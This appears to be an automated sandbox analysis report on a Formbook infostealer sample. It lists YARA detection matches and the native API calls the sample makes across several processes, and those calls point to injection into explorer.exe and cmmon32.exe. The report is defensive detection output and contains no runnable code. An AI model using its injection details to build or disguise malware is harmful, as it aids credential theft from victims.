          Source: Yara match, File source: 00000005.00000002.2661042601.0000000002490000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          Source: 3.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: 3.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 3.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: 3.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.1518903340.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: 00000003.00000002.1518903340.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.1518903340.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2667218858.0000000004120000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: 00000005.00000002.2667218858.0000000004120000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2667218858.0000000004120000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.1485081729.0000000003683000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: 00000000.00000002.1485081729.0000000003683000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.1485081729.0000000003683000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.1485081729.000000000376A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: 00000000.00000002.1485081729.000000000376A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.1485081729.000000000376A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.2682408997.000000000C39C000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_772cc62d, Author: unknown
          Source: 00000000.00000002.1485081729.000000000362E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: 00000000.00000002.1485081729.000000000362E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.1485081729.000000000362E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.2373918036.0000000010F8D000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_772cc62d, Author: unknown
          Source: 00000005.00000002.2666460671.00000000040F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: 00000005.00000002.2666460671.00000000040F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2666460671.00000000040F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2661042601.0000000002490000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: 00000005.00000002.2661042601.0000000002490000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2661042601.0000000002490000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: VFylJFPzqX.exe PID: 7764, type: MEMORYSTR, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: Process Memory Space: AddInProcess32.exe PID: 7984, type: MEMORYSTR, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: Process Memory Space: cmmon32.exe PID: 8104, type: MEMORYSTR, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 3_2_0041A330 NtCreateFile
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 3_2_0041A3E0 NtReadFile
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 3_2_0041A460 NtClose
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 3_2_0041A510 NtAllocateVirtualMemory
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 3_2_0041A32A NtCreateFile
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 3_2_0041A3DA NtReadFile
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 3_2_0041A45A NtClose
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 3_2_0041A50A NtAllocateVirtualMemory
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 3_2_01802BF0 NtAllocateVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 3_2_01802B60 NtClose,LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 3_2_01802AD0 NtReadFile,LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 3_2_01802DD0 NtDelayExecution,LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 3_2_01802DF0 NtQuerySystemInformation,LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 3_2_01802D10 NtMapViewOfSection,LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 3_2_01802D30 NtUnmapViewOfSection,LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 3_2_01802CA0 NtQueryInformationToken,LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 3_2_01802C70 NtFreeVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 3_2_01802F90 NtProtectVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 3_2_01802FB0 NtResumeThread,LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 3_2_01802FE0 NtCreateFile,LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 3_2_01802F30 NtCreateSection,LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 3_2_01802E80 NtReadVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 3_2_01802EA0 NtAdjustPrivilegesToken,LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 3_2_01804340 NtSetContextThread
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 3_2_01804650 NtSuspendThread
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 3_2_01802B80 NtQueryInformationFile
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 3_2_01802BA0 NtEnumerateValueKey
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 3_2_01802BE0 NtQueryValueKey
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 3_2_01802AB0 NtWaitForSingleObject
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 3_2_01802AF0 NtWriteFile
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 3_2_01802DB0 NtEnumerateKey
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 3_2_01802D00 NtSetInformationFile
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 3_2_01802CC0 NtQueryVirtualMemory
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 3_2_01802CF0 NtOpenProcess
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 3_2_01802C00 NtQueryInformationProcess
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 3_2_01802C60 NtCreateKey
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 3_2_01802FA0 NtQuerySection
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 3_2_01802F60 NtCreateProcessEx
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 3_2_01802EE0 NtQueueApcThread
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 3_2_01802E30 NtWriteVirtualMemory
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 3_2_01803090 NtSetValueKey
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 3_2_01803010 NtOpenDirectoryObject
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 3_2_018035C0 NtCreateMutant
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 3_2_018039B0 NtGetContextThread
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 3_2_01803D10 NtOpenProcessToken
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 3_2_01803D70 NtOpenThread
          Source: C:\Windows\explorer.exe; Code function: 4_2_10F75232 NtCreateFile
          Source: C:\Windows\explorer.exe; Code function: 4_2_10F76E12 NtProtectVirtualMemory
          Source: C:\Windows\explorer.exe; Code function: 4_2_10F76E0A NtProtectVirtualMemory
          Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: 5_2_043C2C70 NtFreeVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: 5_2_043C2C60 NtCreateKey,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: 5_2_043C2CA0 NtQueryInformationToken,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: 5_2_043C2D10 NtMapViewOfSection,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: 5_2_043C2DF0 NtQuerySystemInformation,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: 5_2_043C2DD0 NtDelayExecution,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: 5_2_043C2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: 5_2_043C2F30 NtCreateSection,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: 5_2_043C2FE0 NtCreateFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: 5_2_043C2AD0 NtReadFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: 5_2_043C2B60 NtClose,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: 5_2_043C2BF0 NtAllocateVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: 5_2_043C2BE0 NtQueryValueKey,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: 5_2_043C35C0 NtCreateMutant,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: 5_2_043C4650 NtSuspendThread
          Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: 5_2_043C4340 NtSetContextThread
          Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: 5_2_043C2C00 NtQueryInformationProcess
          Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: 5_2_043C2CF0 NtOpenProcess
          Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: 5_2_043C2CC0 NtQueryVirtualMemory
          Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: 5_2_043C2D30 NtUnmapViewOfSection
          Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: 5_2_043C2D00 NtSetInformationFile
          Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: 5_2_043C2DB0 NtEnumerateKey
          Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: 5_2_043C2E30 NtWriteVirtualMemory
          Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: 5_2_043C2E80 NtReadVirtualMemory
          Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: 5_2_043C2EE0 NtQueueApcThread
          Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: 5_2_043C2F60 NtCreateProcessEx
          Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: 5_2_043C2FB0 NtResumeThread
          Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: 5_2_043C2FA0 NtQuerySection
          Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: 5_2_043C2F90 NtProtectVirtualMemory
          Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: 5_2_043C2AB0 NtWaitForSingleObject
          Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: 5_2_043C2AF0 NtWriteFile
          Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: 5_2_043C2BA0 NtEnumerateValueKey
          Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: 5_2_043C2B80 NtQueryInformationFile
          Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: 5_2_043C3010 NtOpenDirectoryObject
          Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: 5_2_043C3090 NtSetValueKey
          Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: 5_2_043C3D10 NtOpenProcessToken
          Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: 5_2_043C3D70 NtOpenThread
          Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: 5_2_043C39B0 NtGetContextThread
          Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: 5_2_024AA330 NtCreateFile
          Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: 5_2_024AA3E0 NtReadFile
          Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: 5_2_024AA460 NtClose
          Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: 5_2_024AA510 NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: 5_2_024AA32A NtCreateFile
          Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: 5_2_024AA3DA NtReadFile
          Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: 5_2_024AA45A NtClose
          Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: 5_2_024AA50A NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: 5_2_041FA036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread
          Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: 5_2_041F9BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose
          Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: 5_2_041FA042 NtQueryInformationProcess
          Source: C:\Windows\SysWOW64\cmmon32.exe; Code function: 5_2_041F9BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
          Source: C:\Users\user\Desktop\VFylJFPzqX.exe; Code function: 0_2_0A21A418 CreateProcessAsUserW
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_00C3C6B80_2_00C3C6B8
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_00C389A80_2_00C389A8
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_00C36A380_2_00C36A38
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_00C370E80_2_00C370E8
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_00C3C6A80_2_00C3C6A8
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_00C3BDE00_2_00C3BDE0
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_056216B80_2_056216B8
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_056211A80_2_056211A8
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05623E680_2_05623E68
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_056216A90_2_056216A9
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_056211980_2_05621198
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_0562DC2C0_2_0562DC2C
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05623E590_2_05623E59
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05A200070_2_05A20007
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05A200400_2_05A20040
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05E54E400_2_05E54E40
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05E5ED280_2_05E5ED28
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05E54E300_2_05E54E30
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05E7CCC00_2_05E7CCC0
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05E76C480_2_05E76C48
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05E706E00_2_05E706E0
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05E7DDA80_2_05E7DDA8
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05E7DD980_2_05E7DD98
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05E7C5450_2_05E7C545
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05E7C55A0_2_05E7C55A
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05E7CCB00_2_05E7CCB0
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05E7CC700_2_05E7CC70
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05E76C380_2_05E76C38
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05E7F4000_2_05E7F400
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05E7EF680_2_05E7EF68
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05E7EF590_2_05E7EF59
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05E787290_2_05E78729
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05E787380_2_05E78738
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05E7E6CC0_2_05E7E6CC
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05E7C6A40_2_05E7C6A4
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05E7C6B90_2_05E7C6B9
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05E776600_2_05E77660
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05E776700_2_05E77670
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05E7A6400_2_05E7A640
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05E7A6500_2_05E7A650
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05E7C6000_2_05E7C600
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05E7C6150_2_05E7C615
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05E781C00_2_05E781C0
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05E7F1A00_2_05E7F1A0
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05E781B30_2_05E781B3
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05E7F1900_2_05E7F190
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05E770C80_2_05E770C8
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05E7A0A00_2_05E7A0A0
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05E7A0900_2_05E7A090
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05E7F3F00_2_05E7F3F0
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05E7C2400_2_05E7C240
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05E7C2310_2_05E7C231
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_073C33000_2_073C3300
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_073CE3A80_2_073CE3A8
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_073CA5580_2_073CA558
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_073C79F00_2_073C79F0
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_073CC1E80_2_073CC1E8
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_073C2C750_2_073C2C75
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_073C3C400_2_073C3C40
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_073C48980_2_073C4898
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_073C94D80_2_073C94D8
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_073C5B280_2_073C5B28
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_073C5B180_2_073C5B18
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_073C7BF80_2_073C7BF8
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_073C7BE90_2_073C7BE9
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_073C99180_2_073C9918
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_073C99080_2_073C9908
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_073C3C3B0_2_073C3C3B
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_073C48710_2_073C4871
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_073C94C80_2_073C94C8
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_0A214E280_2_0A214E28
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_0A2156D20_2_0A2156D2
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_0A210BA00_2_0A210BA0
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_0A2153B80_2_0A2153B8
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_0A214BF00_2_0A214BF0
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_0A2100400_2_0A210040
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_0A214C480_2_0A214C48
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_0A2134E80_2_0A2134E8
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_0A21A9500_2_0A21A950
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_0A213E200_2_0A213E20
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_0A213E080_2_0A213E08
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_0A214E190_2_0A214E19
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_0A217AB00_2_0A217AB0
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_0A2156910_2_0A215691
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_0A210B710_2_0A210B71
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_0A21E7500_2_0A21E750
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_0A2137880_2_0A213788
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_0A21F7D80_2_0A21F7D8
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_0A214C390_2_0A214C39
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_0A21E4380_2_0A21E438
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_0A21003E0_2_0A21003E
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_0A2144700_2_0A214470
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_0A2134D70_2_0A2134D7
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_0A2181080_2_0A218108
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0041D8563_2_0041D856
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_004010303_2_00401030
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0041E8F73_2_0041E8F7
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0041E0B43_2_0041E0B4
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_004012093_2_00401209
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0041DAC33_2_0041DAC3
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0041E3C03_2_0041E3C0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0041EC183_2_0041EC18
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0041DD443_2_0041DD44
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0041E5CB3_2_0041E5CB
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_00402D8A3_2_00402D8A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_00402D903_2_00402D90
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_00409E603_2_00409E60
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_00409E1A3_2_00409E1A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0041DEB03_2_0041DEB0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0041DF943_2_0041DF94
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_00402FB03_2_00402FB0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_018901AA3_2_018901AA
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_018841A23_2_018841A2
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_018881CC3_2_018881CC
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017C01003_2_017C0100
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0186A1183_2_0186A118
